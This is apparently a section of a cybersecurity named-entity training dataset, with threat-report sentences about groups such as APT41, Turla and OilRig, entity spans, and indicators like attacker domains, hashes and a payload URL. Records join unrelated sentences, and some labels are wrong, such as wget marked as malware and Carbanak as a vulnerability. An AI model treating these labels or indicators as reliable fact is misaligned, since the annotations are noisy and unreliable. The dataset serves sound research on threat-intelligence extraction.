As well as its custom malware , Budworm also used a variety of livingofftheland and publicly available tools in these attacks .", "spans": {"TOOL: Python": [[284, 290]], "TOOL: RAT E-TOOL": [[291, 301]], "TOOL: Google Drive": [[400, 412]], "TOOL: Twitter": [[415, 422]], "TOOL: ImgBB": [[425, 430]], "TOOL: Google Forms": [[435, 447]], "MALWARE: malware": [[472, 479]], "THREAT_ACTOR: Budworm": [[482, 489]], "TOOL: livingofftheland and publicly available tools": [[513, 558]]}, "info": {"id": "cyberner_stix_train_001980", "source": "cyberner_stix_train"}} {"text": "FakeSpy is under active development and is evolving rapidly ; new versions are released every week with additional evasion techniques and capabilities . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT10": [[210, 215]], "MALWARE: wget": [[265, 269]], "TOOL: C2": [[317, 319]]}, "info": {"id": "cyberner_stix_train_001981", "source": "cyberner_stix_train"}} {"text": "Specifically , carefully consider which ports should be connecting outbound versus inbound .", "spans": {}, "info": {"id": "cyberner_stix_train_001982", "source": "cyberner_stix_train"}} {"text": "Figure 7 . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . Through its light weight and modular architecture , the GRIFFON implant is the perfect validator . 
Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": {"VULNERABILITY: CVE-2016-4117": [[88, 101]], "MALWARE: GRIFFON": [[189, 196]], "THREAT_ACTOR: Greatness": [[232, 241]], "THREAT_ACTOR: Microsoft 365 phishing pages": [[273, 301]]}, "info": {"id": "cyberner_stix_train_001983", "source": "cyberner_stix_train"}} {"text": "Microsoft Threat Intelligence continually tracks activity groups such as LEAD and BARIUM and documents the tactics , techniques , and procedures they employ in their attacks , with a special focus on the tools and infrastructure they use to facilitate those attacks .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: LEAD": [[73, 77]], "THREAT_ACTOR: BARIUM": [[82, 88]]}, "info": {"id": "cyberner_stix_train_001984", "source": "cyberner_stix_train"}} {"text": "In this second version , the developer ’ s name listed was “ concipit1248 ” in Google Play , and may have been active between May 2019 to February 2020 . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups . in the third case that was implemented , Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"SYSTEM: Google Play": [[79, 90]], "ORGANIZATION: Kaspersky Lab": [[164, 177]], "THREAT_ACTOR: groups": [[285, 291]], "VULNERABILITY: CVE-2022 - 41080": [[453, 469]]}, "info": {"id": "cyberner_stix_train_001985", "source": "cyberner_stix_train"}} {"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . 
If the code pattern is matched with the definitions , Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"THREAT_ACTOR: APT38": [[136, 141]], "ORGANIZATION: banks": [[187, 192]], "ORGANIZATION: financial institutions": [[203, 225]]}, "info": {"id": "cyberner_stix_train_001986", "source": "cyberner_stix_train"}} {"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by “ Agent Smith ” , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions . Tweety Chat 's Android version can record audio , too . This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": {"MALWARE: Agent Smith": [[100, 111]], "SYSTEM: Android": [[217, 224], [411, 418]], "SYSTEM: Android 5 and 6": [[323, 338]], "TOOL: Tweety Chat": [[430, 441]], "TOOL: ZIP archive": [[530, 541]], "TOOL: MSI": [[567, 570]]}, "info": {"id": "cyberner_stix_train_001987", "source": "cyberner_stix_train"}} {"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 . We have analyzed the most common version of ZxShell , version 3.10 . 
None The Foudre string no longer present The window used for keylogging was originally named Foudre giving the malware its name , but has now been renamed to form1 to help the malware evade signaturebased detection", "spans": {"SYSTEM: win32-Trojans": [[84, 97]], "THREAT_ACTOR: Turla": [[153, 158]], "MALWARE: ZxShell": [[293, 300]]}, "info": {"id": "cyberner_stix_train_001988", "source": "cyberner_stix_train"}} {"text": "] net . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER” identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Filename: winload.exe .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "MALWARE: ATM malware": [[54, 65]], "MALWARE: RIPPER": [[86, 92]], "ORGANIZATION: banks": [[266, 271]], "FILEPATH: winload.exe": [[296, 307]]}, "info": {"id": "cyberner_stix_train_001989", "source": "cyberner_stix_train"}} {"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . 
Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control ( C2 ) server .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: maritime": [[54, 62]], "ORGANIZATION: research institutes": [[128, 147]], "ORGANIZATION: academic organizations": [[150, 172]], "ORGANIZATION: private firms": [[179, 192]], "FILEPATH: Pony DLL": [[305, 313]], "FILEPATH: Vawtrak": [[318, 325]], "TOOL: C2": [[403, 405]]}, "info": {"id": "cyberner_stix_train_001990", "source": "cyberner_stix_train"}} {"text": "This backdoor component however is technically very closely related to GeminiDuke , to the extent that we believe them to share parts of their source code .", "spans": {"MALWARE: GeminiDuke": [[71, 81]]}, "info": {"id": "cyberner_stix_train_001991", "source": "cyberner_stix_train"}} {"text": "By proxying all requests through a custom server , the real source of ads is opaque . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp . 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": {"TOOL: NetTraveler": [[110, 121]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "TOOL: NetTraveler Trojan": [[168, 186]], "ORGANIZATION: Taiwanese government": [[334, 354]], "URL: http://shwoo.gov.taipei/buyer_flowchart.asp": [[371, 414]], "SYSTEM: Exchange Server": [[494, 509]]}, "info": {"id": "cyberner_stix_train_001992", "source": "cyberner_stix_train"}} {"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia . which removes the mapping information . Most of the URLs and the infrastructure were not accessible at the time of analysis , although we managed to obtain images from three campaigns to recreate the infection chain .", "spans": {"SYSTEM: Android": [[23, 30]], "MALWARE: RCSAndroid": [[114, 124]], "SYSTEM: 4.4.4 KitKat": [[161, 173]], "THREAT_ACTOR: Cobalt group": [[180, 192]], "SYSTEM: URLs": [[342, 346]]}, "info": {"id": "cyberner_stix_train_001993", "source": "cyberner_stix_train"}} {"text": "We recognized a different type of macOS malware , MarkMakingBot.dmg ( be37637d8f6c1fbe7f3ffc702afdfe1d ) , created on 2019-03-12 .", "spans": {"SYSTEM: macOS": [[34, 39]], "FILEPATH: MarkMakingBot.dmg": [[50, 67]], "FILEPATH: be37637d8f6c1fbe7f3ffc702afdfe1d": [[70, 102]]}, "info": {"id": "cyberner_stix_train_001994", "source": "cyberner_stix_train"}} {"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API . 
Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT . Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": {"SYSTEM: Android": [[85, 92]], "TOOL: Spindest": [[216, 224]], "TOOL: legitimate compromised websites": [[229, 260]], "ORGANIZATION: Cyber Squared 's TCIRT": [[278, 300]], "MALWARE: blackout": [[519, 527]]}, "info": {"id": "cyberner_stix_train_001995", "source": "cyberner_stix_train"}} {"text": "Further , the functionality of the OnionDuke variant is derived from a number of modules .", "spans": {"MALWARE: OnionDuke": [[35, 44]]}, "info": {"id": "cyberner_stix_train_001996", "source": "cyberner_stix_train"}} {"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": {"ORGANIZATION: FireEye": [[117, 124]], "ORGANIZATION: Dragos": [[179, 185]]}, "info": {"id": "cyberner_stix_train_001997", "source": "cyberner_stix_train"}} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . 
The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"MALWARE: email stealer": [[4, 17]], "MALWARE: sctrls backdoor": [[256, 271]], "VULNERABILITY: CVE-2015-1641": [[325, 338]]}, "info": {"id": "cyberner_stix_train_001998", "source": "cyberner_stix_train"}} {"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": {"ORGANIZATION: Github": [[8, 14]], "MALWARE: ViceLeaker": [[167, 177]], "THREAT_ACTOR: group": [[304, 309]], "TOOL: email": [[352, 357]], "ORGANIZATION: ZLAB": [[414, 418]], "THREAT_ACTOR: TA505": [[528, 533]]}, "info": {"id": "cyberner_stix_train_001999", "source": "cyberner_stix_train"}} {"text": "Trend Micro ’ s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . 
Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "SYSTEM: Mobile App Reputation Service": [[16, 45]], "SYSTEM: Android": [[62, 69]], "SYSTEM: iOS": [[74, 77]], "TOOL: CobaltStrike": [[552, 564]], "TOOL: Powershell": [[574, 584]], "TOOL: Empire": [[585, 591]]}, "info": {"id": "cyberner_stix_train_002000", "source": "cyberner_stix_train"}} {"text": "In 2018 , we saw similar behavior , but all the click actions were hardcoded and suited only for the app of the attacker ’ s choice . On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"ORGANIZATION: we": [[147, 149]], "THREAT_ACTOR: Lazarus group": [[242, 255]], "TOOL: emails": [[305, 311]], "ORGANIZATION: job recruiters": [[326, 340]]}, "info": {"id": "cyberner_stix_train_002001", "source": "cyberner_stix_train"}} {"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: banks": [[58, 63]], "ORGANIZATION: e-payment": [[66, 75]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]]}, "info": {"id": "cyberner_stix_train_002002", "source": "cyberner_stix_train"}} {"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget . 
These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK ’s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": {"THREAT_ACTOR: OilRig": [[178, 184]], "ORGANIZATION: government": [[357, 367]], "MALWARE: N56.15.doc": [[370, 380]], "TOOL: uncompyle6": [[558, 568], [590, 600]], "MALWARE: LIGHTWORK ’s": [[787, 799]], "VULNERABILITY: IEC-104 protocol": [[813, 829]]}, "info": {"id": "cyberner_stix_train_002003", "source": "cyberner_stix_train"}} {"text": "But they already have a lot of infected users on whom to test their methods . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 . 
The second webpage , “ sidebar.html ” contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": {"ORGANIZATION: Mandiant": [[352, 360]], "THREAT_ACTOR: APT1": [[411, 415]]}, "info": {"id": "cyberner_stix_train_002004", "source": "cyberner_stix_train"}} {"text": "The macros used for these delivery documents use a less common method of using the AutoClose function .", "spans": {"TOOL: macros": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002005", "source": "cyberner_stix_train"}} {"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": {"MALWARE: Marcher": [[9, 16]], "ORGANIZATION: Researchers": [[120, 131]], "THREAT_ACTOR: Lazarus": [[143, 150]], "TOOL: malicious implant": [[194, 211]], "THREAT_ACTOR: Rising Sun": [[221, 231]], "ORGANIZATION: defense organizations": [[295, 316]]}, "info": {"id": "cyberner_stix_train_002006", "source": "cyberner_stix_train"}} {"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": {"THREAT_ACTOR: APT41": [[57, 62]], "FILEPATH: AutoHotKey scripts": [[257, 275]]}, "info": {"id": "cyberner_stix_train_002007", "source": "cyberner_stix_train"}} {"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address . 
All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": {"THREAT_ACTOR: group": [[177, 182]], "TOOL: Internet Explorer": [[210, 227]], "TOOL: Flash": [[232, 237]]}, "info": {"id": "cyberner_stix_train_002008", "source": "cyberner_stix_train"}} {"text": "usv0503.iqservs-jp.com aux.robertstockdill.com fli.fedora-dns-update.com bss.pvtcdn.com ssl.microsoft-security-center.com ssl.2upgrades.com 133.242.134.121 fli.fedora-dns-update.com .", "spans": {"DOMAIN: usv0503.iqservs-jp.com": [[0, 22]], "DOMAIN: aux.robertstockdill.com": [[23, 46]], "DOMAIN: fli.fedora-dns-update.com": [[47, 72], [156, 181]], "DOMAIN: bss.pvtcdn.com": [[73, 87]], "DOMAIN: ssl.microsoft-security-center.com": [[88, 121]], "DOMAIN: ssl.2upgrades.com": [[122, 139]], "IP_ADDRESS: 133.242.134.121": [[140, 155]]}, "info": {"id": "cyberner_stix_train_002009", "source": "cyberner_stix_train"}} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . 
Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]], "MALWARE: Remexi": [[159, 165]], "MALWARE: Trojan": [[187, 193]]}, "info": {"id": "cyberner_stix_train_002010", "source": "cyberner_stix_train"}} {"text": "Depending on which app ( package name ) generated the event , Riltok can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": {"MALWARE: Riltok": [[62, 68]], "SYSTEM: Google Play": [[87, 98]], "ORGANIZATION: ESET": [[452, 456]], "TOOL: PowerShell scripts": [[475, 493]], "THREAT_ACTOR: Turla": [[508, 513]], "TOOL: C2": [[583, 585]], "DOMAIN: dowhelsitjs.netau.net": [[665, 686]]}, "info": {"id": "cyberner_stix_train_002011", "source": "cyberner_stix_train"}} {"text": "The encrypted ZeroT payload , named Mctl.mui , is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously .", "spans": {"MALWARE: ZeroT": [[14, 19], [158, 163]], "FILEPATH: Mctl.mui": [[36, 44]], "TOOL: PE": [[99, 101]]}, "info": {"id": "cyberner_stix_train_002012", "source": "cyberner_stix_train"}} {"text": "An attacker is paid by the network when one of these apps is installed successfully . 
Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents . with 2 . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"THREAT_ACTOR: groups": [[92, 98]], "THREAT_ACTOR: attackers": [[121, 130]], "THREAT_ACTOR: Rocket Kitten": [[141, 154]], "ORGANIZATION: anonymous proxy users": [[215, 236]], "ORGANIZATION: researchers": [[239, 250]], "ORGANIZATION: journalists": [[253, 264]], "ORGANIZATION: dissidents": [[271, 281]], "ORGANIZATION: FireEye": [[368, 375]], "TOOL: Cobalt Strike": [[437, 450]]}, "info": {"id": "cyberner_stix_train_002013", "source": "cyberner_stix_train"}} {"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": {"THREAT_ACTOR: Machete": [[116, 123]], "THREAT_ACTOR: operators": [[305, 314]], "THREAT_ACTOR: APT38": [[323, 328]]}, "info": {"id": "cyberner_stix_train_002014", "source": "cyberner_stix_train"}} {"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers . These unknown actors continued launching DDoS attacks over the next few years . 
We have found several victims of this campaign , based on our telemetry – investment and trading companies in Vietnam and Russia .", "spans": {"THREAT_ACTOR: unknown actors": [[168, 182]]}, "info": {"id": "cyberner_stix_train_002015", "source": "cyberner_stix_train"}} {"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent . Execute a command and send the output to Google Forms . Once encryption is complete , it attempts to delete Volume Shadow VSS copies .", "spans": {"ORGANIZATION: Google": [[13, 19]], "SYSTEM: Google Play Store": [[130, 147]], "TOOL: Clayslide documents": [[227, 246]], "TOOL: Helminth": [[289, 297]], "TOOL: ISMDoor Trojan": [[360, 374]], "TOOL: ISMAgent": [[435, 443]], "TOOL: Google Forms": [[487, 499]]}, "info": {"id": "cyberner_stix_train_002016", "source": "cyberner_stix_train"}} {"text": "By browsing EventBot ’ s installation path on the device , we can see the library dropped in the app_dex folder . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": {"MALWARE: EventBot": [[12, 20]], "ORGANIZATION: Anomali": [[114, 121]], "MALWARE: ITW": [[200, 203]], "VULNERABILITY: CVE-2018-0798": [[231, 244]], "THREAT_ACTOR: APT35": [[247, 252]], "THREAT_ACTOR: Newscaster Team": [[273, 288]]}, "info": {"id": "cyberner_stix_train_002017", "source": "cyberner_stix_train"}} {"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Axiom : Group72 .", "spans": {"ORGANIZATION: Huawei": [[107, 113]], "THREAT_ACTOR: Axiom": [[298, 303]], "THREAT_ACTOR: Group72": [[306, 313]]}, "info": {"id": "cyberner_stix_train_002018", "source": "cyberner_stix_train"}} {"text": "However , this time the app name for both HenBox and the embedded app were identical : Islamawazi . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": {"MALWARE: HenBox": [[42, 48]], "SYSTEM: Islamawazi": [[87, 97]], "THREAT_ACTOR: APT41": [[100, 105]], "ORGANIZATION: FireEye": [[171, 178]], "MALWARE: APT28": [[289, 294]], "MALWARE: malware": [[295, 302]], "MALWARE: CHOPSTICK": [[364, 373]]}, "info": {"id": "cyberner_stix_train_002019", "source": "cyberner_stix_train"}} {"text": "While doing so , it will reach a service exported by “ Agent Smith ” , and sends out an authentication request that would lead to a call to the ‘ addAccount ’ method . 
Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind . Msiexec.exe next calls rundll32.exe , specifying loader DLL E-TOOL ( urlmon.7z in the example above ) in order to decrypt the data file . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"MALWARE: Agent Smith": [[55, 66]], "TOOL: Anunak/Carbanak": [[213, 228]], "ORGANIZATION: Fox-IT": [[243, 249]], "ORGANIZATION: Kaspersky": [[254, 263]], "FILEPATH: Msiexec.exe": [[280, 291]], "FILEPATH: rundll32.exe": [[303, 315]], "TOOL: loader": [[329, 335]], "TOOL: DLL E-TOOL": [[336, 346]], "FILEPATH: urlmon.7z": [[349, 358]], "MALWARE: decrypt the data file": [[394, 415]], "TOOL: Google": [[486, 492]], "TOOL: Adobe": [[525, 530]]}, "info": {"id": "cyberner_stix_train_002020", "source": "cyberner_stix_train"}} {"text": "Google is actively combating this use of the service , responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks . The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84 . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: telecoms companies": [[244, 262]], "ORGANIZATION: customers": [[288, 297]], "THREAT_ACTOR: Threat actors": [[426, 439]], "THREAT_ACTOR: Winnti group": [[449, 461]]}, "info": {"id": "cyberner_stix_train_002021", "source": "cyberner_stix_train"}} {"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table . 
Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States . The resources also store one or more C2 communication modules . There is another important point we stole a fairly large amount of sensitive data from your local network financial documents personal information of your employees , customers , partners work documentation , postal correspondence and much more .", "spans": {"TOOL: unsophisticated technical merit": [[108, 139]], "TOOL: C2": [[384, 386]]}, "info": {"id": "cyberner_stix_train_002022", "source": "cyberner_stix_train"}} {"text": "When the victim double clicks on the executable file , it unpacks and installs the Spark backdoor , as shown in the attack tree screenshot below .", "spans": {"MALWARE: Spark backdoor": [[83, 97]]}, "info": {"id": "cyberner_stix_train_002023", "source": "cyberner_stix_train"}} {"text": "Specific targets include staff working for or associated with Hillary Clinton's presidential campaign and the Democratic National Committee ( DNC ) , including individuals managing Clinton's communications , travel , campaign finances , and advising her on policy .", "spans": {"ORGANIZATION: Democratic National Committee": [[110, 139]], "ORGANIZATION: DNC": [[142, 145]]}, "info": {"id": "cyberner_stix_train_002024", "source": "cyberner_stix_train"}} {"text": "Kaspersky Labs has previously noted the presence of Russian-language artefacts in some of the Duke malware samples .", "spans": {"ORGANIZATION: Kaspersky Labs": [[0, 14]], "THREAT_ACTOR: Duke": [[94, 98]]}, "info": {"id": "cyberner_stix_train_002025", "source": "cyberner_stix_train"}} {"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with Scarlet Mimic continued use of older 
vulnerabilities in their spear-phishing efforts . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: Scarlet Mimic": [[147, 160]], "THREAT_ACTOR: actors": [[265, 271]], "ORGANIZATION: individual": [[306, 316]]}, "info": {"id": "cyberner_stix_train_002026", "source": "cyberner_stix_train"}} {"text": "The URL will trigger exploits for arbitrary memory read ( CVE-2012-2825 ) and heap buffer overflow ( CVE-2012-2871 ) vulnerabilities in the default browsers of Android versions 4.0 Ice Cream Sandwich to 4.3 Jelly Bean , allowing another local privilege escalation exploit to execute . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . ( which is further explained later ) The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"VULNERABILITY: arbitrary memory read ( CVE-2012-2825 )": [[34, 73]], "VULNERABILITY: heap buffer overflow ( CVE-2012-2871 )": [[78, 116]], "SYSTEM: Android versions 4.0 Ice Cream Sandwich": [[160, 199]], "SYSTEM: 4.3 Jelly Bean": [[203, 217]], "VULNERABILITY: Carbanak": [[305, 313]], "THREAT_ACTOR: criminals": [[380, 389]], "ORGANIZATION: financial industry": [[430, 448]], "ORGANIZATION: customers": [[472, 481]]}, "info": {"id": "cyberner_stix_train_002027", "source": "cyberner_stix_train"}} {"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were 
SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 192.119.15.36 880 http://192.119.15.36:880/ftp.exe . Cybersecurity researchers recently uncovered a phishing campaign , dubbed BadBlood , aimed at 25 senior professionals specializing in genetic , neurology , and oncology research in the U.S. and Israel .", "spans": {"SYSTEM: Facebook": [[203, 211]], "SYSTEM: Viber": [[234, 239]], "SYSTEM: WhatsApp": [[262, 270]], "MALWARE: IOC files": [[523, 532]], "THREAT_ACTOR: HIDDEN COBRA": [[541, 553]], "TOOL: FALLCHILL": [[576, 585]], "MALWARE: .NET FTP": [[648, 656]], "IP_ADDRESS: 192.119.15.36 880": [[689, 706]], "URL: http://192.119.15.36:880/ftp.exe": [[707, 739]], "ORGANIZATION: Cybersecurity researchers": [[742, 767]], "ORGANIZATION: 25 senior professionals specializing in genetic , neurology , and oncology research": [[836, 919]]}, "info": {"id": "cyberner_stix_train_002028", "source": "cyberner_stix_train"}} {"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Although it doesn’t contain an internal name , we believe it’s a variant of HttpProv library , as described in the ESET white paper on OceanLotus . 
